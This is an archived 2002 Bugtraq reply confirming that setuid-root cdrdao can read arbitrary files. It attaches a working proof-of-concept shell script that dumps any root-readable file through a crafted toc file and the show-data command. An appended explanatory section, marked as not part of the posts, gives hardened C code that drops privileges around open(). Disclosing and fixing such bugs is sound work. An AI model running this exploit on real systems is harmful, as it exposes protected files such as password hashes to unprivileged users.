[23855] in bugtraq

Re: cdrdao insecure filehandling

daemon@ATHENA.MIT.EDU (Guillaume PELAT)
Tue Jan 15 17:52:17 2002

Message-ID: <006501c19da9$688ed6f0$4d3e010a@intexxiaxh2dm7>
From: "Guillaume PELAT" <guillaume.pelat@intexxia.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 15 Jan 2002 10:45:46 +0100

"Jens Steube" <jsteube@lastflood.com> wrote in message
news:1010876960.3c40c220caef8@troja.dnsalias.org...
> --[ Bugs ]--
>
> Cdrdao doesn't check for permissions when it tries to open a file
> as its "toc-file". So it was possible to open all files on the
> system, but it skips the output in its error message. Maybe it is
> possible to trick it into reading all these files.

I confirm it is possible to read all these files using the show-data command.
A proof of concept script is attached.

--
Guillaume Pelat
Security Expert

INTEXXIA
171 Av. Georges Clemenceau
92024 NANTERRE CEDEX - FRANCE
tel: +33 1 55 69 49 10
fax: +33 1 55 69 78 80
http://www.intexxia.com

[Attachment: show_file.sh]

#!/bin/sh
# Proof of concept: make cdrdao (setuid root) read an arbitrary file as the
# data of a MODE1_RAW track, then turn the 16-bit sample dump printed by
# "show-data" back into the file's bytes.

if [ "$1" ]; then
	# Private scratch directory instead of fixed /tmp names, so the helper
	# binary cannot be hijacked through a predictable path.
	T=$(mktemp -d) || exit 1

	# Helper: read each 16-bit sample value and emit it as two raw bytes.
	cat > "$T/t.c" <<EOF
#include <stdio.h>
int     main(void)
{
	int     i;
	while (fscanf(stdin, "%i", &i) > 0)
	{
		printf("%c%c", (i & 0xff00) >> 8, i & 0xff);
	}
	return 0;
}
EOF
	# Minimal toc file whose track data is the target file.
	cat > "$T/t.toc" <<EOF
CD_ROM
TRACK MODE1_RAW
FILE "$1" 0
EOF
	gcc "$T/t.c" -o "$T/show"
	# show-data prints one line per sample (an offset, a colon, then the
	# sample values); strip the offsets and feed the values to the helper.
	echo `cdrdao show-data -v 0 --force "$T/t.toc" 2>&1 | grep -v WARNING | sed 's/.*://g'` | "$T/show"
	rm -rf "$T"
else
	echo "Syntax: $0 filename"
fi
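
The bug class behind this thread is a setuid-root program opening a caller-supplied path with its elevated privileges, so the caller reads anything root can read. As an added example that is not cdrdao's code and not part of either post, the C sketch below puts the naive open next to a hardened one that switches the effective uid/gid back to the invoker's real ids around the open, so the kernel's own permission check applies to the caller rather than to root. The function names and the sample file are assumptions made for the illustration.

```c
/* Added example: the insecure-open bug class next to a hardened open.
   All names here are hypothetical; none of this is cdrdao code. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Vulnerable pattern: a setuid-root program opens a path the caller
   chose while its effective uid is still 0, so the caller learns the
   content of any file root can read (the class of bug reported above). */
int open_with_program_privs(const char *path)
{
    return open(path, O_RDONLY);
}

/* Hardened pattern: switch the effective ids to the caller's real ids
   around the open so the kernel enforces the caller's permissions.
   Checking with access() first would be a time-of-check/time-of-use
   race; switching credentials around the open itself is not.
   Returns an fd, or -1 with errno set. */
int open_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    /* Drop the group first: once euid is unprivileged, setegid() could
       fail. When the binary is not setuid these calls are no-ops. */
    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        return -1;

    fd = open(path, O_RDONLY);
    saved_errno = errno;

    /* Restore privileges for the rest of the program; carrying on
       half-privileged is worse than aborting. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        abort();

    errno = saved_errno;
    return fd;
}

/* Self-check: a file we own must open and read back correctly, and a
   path the caller cannot reach must fail. Returns 1 on success, 0 otherwise. */
int demo(void)
{
    char tmpl[] = "/tmp/open_demo_XXXXXX";   /* constructed sample file */
    const char *secret = "sample contents\n";
    char buf[64];
    ssize_t n;
    int fd, ok = 0;

    fd = mkstemp(tmpl);
    if (fd < 0)
        return 0;
    if (write(fd, secret, strlen(secret)) != (ssize_t)strlen(secret)) {
        close(fd);
        unlink(tmpl);
        return 0;
    }
    close(fd);

    fd = open_as_invoker(tmpl);
    if (fd >= 0) {
        n = read(fd, buf, sizeof buf - 1);
        close(fd);
        if (n > 0) {
            buf[n] = '\0';
            ok = strcmp(buf, secret) == 0;
        }
    }
    unlink(tmpl);

    /* Unreachable path: must fail with the caller's rights, not root's. */
    if (open_as_invoker("/nonexistent/no-such-file") != -1)
        ok = 0;
    return ok;
}

int main(void)
{
    int ok = demo();
    printf("demo: %s\n", ok ? "ok" : "FAILED");
    return ok ? 0 : 1;
}
```

When the binary is not setuid the credential switches are no-ops, but the code path is the one a setuid build would take. The same treatment applies to every file such a program opens on the user's behalf, here the toc file itself and each FILE it references.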
